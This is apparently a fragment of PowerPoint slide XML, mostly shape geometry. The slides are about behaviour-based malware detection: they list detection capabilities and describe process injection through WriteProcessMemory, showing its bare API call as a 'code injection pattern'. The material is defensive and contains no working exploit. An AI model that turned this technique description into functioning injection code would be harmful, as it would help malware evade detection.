                  <a:pt x="3206" y="119510"/>
                  <a:pt x="3206" y="109010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3206" y="96626"/>
                  <a:pt x="10260" y="85845"/>
                  <a:pt x="20519" y="80515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17674" y="75706"/>
                  <a:pt x="16031" y="70095"/>
                  <a:pt x="16031" y="64123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16031" y="46409"/>
                  <a:pt x="30378" y="32062"/>
                  <a:pt x="48093" y="32062"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48093" y="22443"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157102" y="22443"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157102" y="32062"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="174816" y="32062"/>
                  <a:pt x="189164" y="46409"/>
                  <a:pt x="189164" y="64123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189164" y="70135"/>
                  <a:pt x="187521" y="75746"/>
                  <a:pt x="184675" y="80515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194975" y="85845"/>
                  <a:pt x="201989" y="96586"/>
                  <a:pt x="201989" y="109010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201989" y="119510"/>
                  <a:pt x="196939" y="128808"/>
                  <a:pt x="189164" y="134659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="193172" y="140030"/>
                  <a:pt x="195576" y="146682"/>
                  <a:pt x="195576" y="153896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195576" y="171610"/>
                  <a:pt x="181229" y="185958"/>
                  <a:pt x="163515" y="185958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163234" y="185958"/>
                  <a:pt x="162994" y="185958"/>
                  <a:pt x="162713" y="185958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159868" y="197019"/>
                  <a:pt x="149808" y="205195"/>
                  <a:pt x="137865" y="205195"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="125041" y="205195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="117947" y="205195"/>
                  <a:pt x="112216" y="199464"/>
                  <a:pt x="112216" y="192370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="112216" y="12825"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="112216" y="5731"/>
                  <a:pt x="117947" y="0"/>
                  <a:pt x="125041" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="134659" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="147043" y="0"/>
                  <a:pt x="157102" y="10059"/>
                  <a:pt x="157102" y="2244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9" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659324" y="4117472"/>
            <a:ext cx="5121324" cy="2735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1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Capabilities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24205" y="4611864"/>
            <a:ext cx="153896" cy="153896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="153896" h="153896">
                <a:moveTo>
                  <a:pt x="76948" y="153896"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119417" y="153896"/>
                  <a:pt x="153896" y="119417"/>
                  <a:pt x="153896" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="153896" y="34479"/>
                  <a:pt x="119417" y="0"/>
                  <a:pt x="76948" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34479" y="0"/>
                  <a:pt x="0" y="34479"/>
                  <a:pt x="0" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="119417"/>
                  <a:pt x="34479" y="153896"/>
                  <a:pt x="76948" y="153896"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="102317" y="63933"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78271" y="102407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="77008" y="104421"/>
                  <a:pt x="74844" y="105683"/>
                  <a:pt x="72469" y="105804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70095" y="105924"/>
                  <a:pt x="67811" y="104842"/>
                  <a:pt x="66398" y="102918"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51970" y="83681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49565" y="80495"/>
                  <a:pt x="50227" y="75986"/>
                  <a:pt x="53413" y="73582"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56599" y="71177"/>
                  <a:pt x="61108" y="71838"/>
                  <a:pt x="63512" y="75024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71628" y="85845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90083" y="56298"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92187" y="52932"/>
                  <a:pt x="96636" y="51880"/>
                  <a:pt x="100033" y="54014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103429" y="56148"/>
                  <a:pt x="104451" y="60567"/>
                  <a:pt x="102317" y="6396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1" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697798" y="4577665"/>
            <a:ext cx="3214721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Zero-Day Detection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697798" y="4851258"/>
            <a:ext cx="3206171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77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Identifies unknown threats without signature updates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424205" y="5156379"/>
            <a:ext cx="153896" cy="153896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="153896" h="153896">
                <a:moveTo>
                  <a:pt x="76948" y="153896"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119417" y="153896"/>
                  <a:pt x="153896" y="119417"/>
                  <a:pt x="153896" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="153896" y="34479"/>
                  <a:pt x="119417" y="0"/>
                  <a:pt x="76948" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34479" y="0"/>
                  <a:pt x="0" y="34479"/>
                  <a:pt x="0" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="119417"/>
                  <a:pt x="34479" y="153896"/>
                  <a:pt x="76948" y="153896"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="102317" y="63933"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78271" y="102407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="77008" y="104421"/>
                  <a:pt x="74844" y="105683"/>
                  <a:pt x="72469" y="105804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70095" y="105924"/>
                  <a:pt x="67811" y="104842"/>
                  <a:pt x="66398" y="102918"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51970" y="83681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49565" y="80495"/>
                  <a:pt x="50227" y="75986"/>
                  <a:pt x="53413" y="73582"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56599" y="71177"/>
                  <a:pt x="61108" y="71838"/>
                  <a:pt x="63512" y="75024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71628" y="85845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90083" y="56298"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92187" y="52932"/>
                  <a:pt x="96636" y="51880"/>
                  <a:pt x="100033" y="54014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103429" y="56148"/>
                  <a:pt x="104451" y="60567"/>
                  <a:pt x="102317" y="6396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4" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697798" y="5122180"/>
            <a:ext cx="3163422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Real-Time Analysis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697798" y="5395773"/>
            <a:ext cx="3154872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77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Monitors API calls with minimal performance impact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424205" y="5700894"/>
            <a:ext cx="153896" cy="153896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="153896" h="153896">
                <a:moveTo>
                  <a:pt x="76948" y="153896"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119417" y="153896"/>
                  <a:pt x="153896" y="119417"/>
                  <a:pt x="153896" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="153896" y="34479"/>
                  <a:pt x="119417" y="0"/>
                  <a:pt x="76948" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34479" y="0"/>
                  <a:pt x="0" y="34479"/>
                  <a:pt x="0" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="119417"/>
                  <a:pt x="34479" y="153896"/>
                  <a:pt x="76948" y="153896"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="102317" y="63933"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78271" y="102407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="77008" y="104421"/>
                  <a:pt x="74844" y="105683"/>
                  <a:pt x="72469" y="105804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70095" y="105924"/>
                  <a:pt x="67811" y="104842"/>
                  <a:pt x="66398" y="102918"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51970" y="83681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49565" y="80495"/>
                  <a:pt x="50227" y="75986"/>
                  <a:pt x="53413" y="73582"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56599" y="71177"/>
                  <a:pt x="61108" y="71838"/>
                  <a:pt x="63512" y="75024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71628" y="85845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90083" y="56298"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92187" y="52932"/>
                  <a:pt x="96636" y="51880"/>
                  <a:pt x="100033" y="54014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103429" y="56148"/>
                  <a:pt x="104451" y="60567"/>
                  <a:pt x="102317" y="6396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7" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697798" y="5666695"/>
            <a:ext cx="2941128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Behavioral Correlation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6697798" y="5940288"/>
            <a:ext cx="2932578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77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Links individual indicators to reveal attack chains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424205" y="6245408"/>
            <a:ext cx="153896" cy="153896"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="153896" h="153896">
                <a:moveTo>
                  <a:pt x="76948" y="153896"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119417" y="153896"/>
                  <a:pt x="153896" y="119417"/>
                  <a:pt x="153896" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="153896" y="34479"/>
                  <a:pt x="119417" y="0"/>
                  <a:pt x="76948" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34479" y="0"/>
                  <a:pt x="0" y="34479"/>
                  <a:pt x="0" y="76948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="119417"/>
                  <a:pt x="34479" y="153896"/>
                  <a:pt x="76948" y="153896"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="102317" y="63933"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78271" y="102407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="77008" y="104421"/>
                  <a:pt x="74844" y="105683"/>
                  <a:pt x="72469" y="105804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70095" y="105924"/>
                  <a:pt x="67811" y="104842"/>
                  <a:pt x="66398" y="102918"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51970" y="83681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49565" y="80495"/>
                  <a:pt x="50227" y="75986"/>
                  <a:pt x="53413" y="73582"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56599" y="71177"/>
                  <a:pt x="61108" y="71838"/>
                  <a:pt x="63512" y="75024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="71628" y="85845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90083" y="56298"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92187" y="52932"/>
                  <a:pt x="96636" y="51880"/>
                  <a:pt x="100033" y="54014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103429" y="56148"/>
                  <a:pt x="104451" y="60567"/>
                  <a:pt x="102317" y="6396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0" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697798" y="6211209"/>
            <a:ext cx="3146323" cy="23939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APT Identification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6697798" y="6484803"/>
            <a:ext cx="3137773" cy="1709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077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Detects sophisticated, multi-stage attack campaigns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6644" y="359309"/>
            <a:ext cx="65329" cy="522631"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="65329" h="522631">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65329" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65329" y="522631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="522631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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522631" y="326644"/>
            <a:ext cx="5446794" cy="1959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9" b="1" kern="0" spc="103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Category 01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22631" y="587960"/>
            <a:ext cx="5528455" cy="3266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1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Process Injection &amp; Memory Manipulation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22631" y="1045262"/>
            <a:ext cx="11416220" cy="228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7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techniques for executing malicious code within legitimate processes to evade detection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42977" y="1404571"/>
            <a:ext cx="5691778" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5691778" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5691778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5691778" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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342977" y="1404571"/>
            <a:ext cx="32664" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32664" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32664" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32664" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489967" y="1535228"/>
            <a:ext cx="391973" cy="391973"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="391973" h="391973">
                <a:moveTo>
                  <a:pt x="32663" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="359310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="377349" y="0"/>
                  <a:pt x="391973" y="14624"/>
                  <a:pt x="391973" y="32663"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="391973" y="359310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="391973" y="377349"/>
                  <a:pt x="377349" y="391973"/>
                  <a:pt x="359310" y="391973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32663" y="391973"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="391973"/>
                  <a:pt x="0" y="377349"/>
                  <a:pt x="0" y="359310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32663"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32663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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587960" y="1633222"/>
            <a:ext cx="195987" cy="195987"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="195987" h="195987">
                <a:moveTo>
                  <a:pt x="24498" y="24498"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10986" y="24498"/>
                  <a:pt x="0" y="35484"/>
                  <a:pt x="0" y="48997"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="51829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="54432"/>
                  <a:pt x="1684" y="56652"/>
                  <a:pt x="3866" y="58069"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8919" y="61361"/>
                  <a:pt x="12249" y="67026"/>
                  <a:pt x="12249" y="73495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12249" y="79964"/>
                  <a:pt x="8919" y="85629"/>
                  <a:pt x="3866" y="88921"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1684" y="90338"/>
                  <a:pt x="0" y="92558"/>
                  <a:pt x="0" y="95161"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="116367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195987" y="116367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195987" y="95161"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="195987" y="92558"/>
                  <a:pt x="194302" y="90338"/>
                  <a:pt x="192120" y="88921"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="187068" y="85629"/>
                  <a:pt x="183737" y="79964"/>
                  <a:pt x="183737" y="73495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183737" y="67026"/>
                  <a:pt x="187068" y="61361"/>
                  <a:pt x="192120" y="58069"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194302" y="56652"/>
                  <a:pt x="195987" y="54432"/>
                  <a:pt x="195987" y="51829"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="195987" y="48997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="195987" y="35484"/>
                  <a:pt x="185001" y="24498"/>
                  <a:pt x="171488" y="24498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24498" y="24498"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="195987" y="159239"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195987" y="134741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="134741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159239"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="166014"/>
                  <a:pt x="5474" y="171488"/>
                  <a:pt x="12249" y="171488"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36747" y="171488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36747" y="162301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36747" y="157210"/>
                  <a:pt x="40843" y="153115"/>
                  <a:pt x="45934" y="153115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51025" y="153115"/>
                  <a:pt x="55121" y="157210"/>
                  <a:pt x="55121" y="162301"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="55121" y="171488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88806" y="171488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88806" y="162301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="88806" y="157210"/>
                  <a:pt x="92902" y="153115"/>
                  <a:pt x="97993" y="153115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103084" y="153115"/>
                  <a:pt x="107180" y="157210"/>
                  <a:pt x="107180" y="162301"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="107180" y="171488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140865" y="171488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140865" y="162301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="140865" y="157210"/>
                  <a:pt x="144961" y="153115"/>
                  <a:pt x="150052" y="153115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155143" y="153115"/>
                  <a:pt x="159239" y="157210"/>
                  <a:pt x="159239" y="162301"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="159239" y="171488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183737" y="171488"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190513" y="171488"/>
                  <a:pt x="195987" y="166014"/>
                  <a:pt x="195987" y="159239"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="61246" y="61246"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="61246" y="85744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="61246" y="92519"/>
                  <a:pt x="55772" y="97993"/>
                  <a:pt x="48997" y="97993"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42221" y="97993"/>
                  <a:pt x="36747" y="92519"/>
                  <a:pt x="36747" y="85744"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36747" y="61246"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36747" y="54470"/>
                  <a:pt x="42221" y="48997"/>
                  <a:pt x="48997" y="48997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55772" y="48997"/>
                  <a:pt x="61246" y="54470"/>
                  <a:pt x="61246" y="61246"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="110242" y="61246"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="110242" y="85744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110242" y="92519"/>
                  <a:pt x="104769" y="97993"/>
                  <a:pt x="97993" y="97993"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91218" y="97993"/>
                  <a:pt x="85744" y="92519"/>
                  <a:pt x="85744" y="85744"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="85744" y="61246"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="85744" y="54470"/>
                  <a:pt x="91218" y="48997"/>
                  <a:pt x="97993" y="48997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104769" y="48997"/>
                  <a:pt x="110242" y="54470"/>
                  <a:pt x="110242" y="61246"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="159239" y="61246"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="159239" y="85744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="159239" y="92519"/>
                  <a:pt x="153765" y="97993"/>
                  <a:pt x="146990" y="97993"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="140215" y="97993"/>
                  <a:pt x="134741" y="92519"/>
                  <a:pt x="134741" y="85744"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="134741" y="61246"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="134741" y="54470"/>
                  <a:pt x="140215" y="48997"/>
                  <a:pt x="146990" y="48997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="153765" y="48997"/>
                  <a:pt x="159239" y="54470"/>
                  <a:pt x="159239" y="61246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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012597" y="1535228"/>
            <a:ext cx="4973160" cy="228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WriteProcessMemory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12597" y="1829208"/>
            <a:ext cx="4956828" cy="3919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9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Injects malicious code directly into the memory space of a target process. This technique allows malware to execute within the context of a legitimate process.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012597" y="2319175"/>
            <a:ext cx="4891499" cy="1045262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4891499" h="1045262">
                <a:moveTo>
                  <a:pt x="32664" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4858835" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4876875" y="0"/>
                  <a:pt x="4891499" y="14624"/>
                  <a:pt x="4891499" y="32664"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4891499" y="1012597"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4891499" y="1030638"/>
                  <a:pt x="4876875" y="1045262"/>
                  <a:pt x="4858835" y="1045262"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32664" y="1045262"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="1045262"/>
                  <a:pt x="0" y="1030638"/>
                  <a:pt x="0" y="1012597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32664"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32664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3" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110591" y="2417168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Code Injection Pattern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10591" y="2613155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WriteProcessMemory(hProcess,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10591" y="2776477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lpBaseAddress,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10591" y="2939799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lpBuffer, nSize,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10591" y="3103121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lpNumberOfBytesWritten);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178988" y="1404571"/>
            <a:ext cx="5691778" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5691778" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5691778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5691778" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178988" y="1404571"/>
            <a:ext cx="32664" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32664" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32664" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32664" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325978" y="1535228"/>
            <a:ext cx="391973" cy="391973"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="391973" h="391973">
                <a:moveTo>
                  <a:pt x="32663" y="0"/>
                </a:moveTo>
                <a:lnTo>
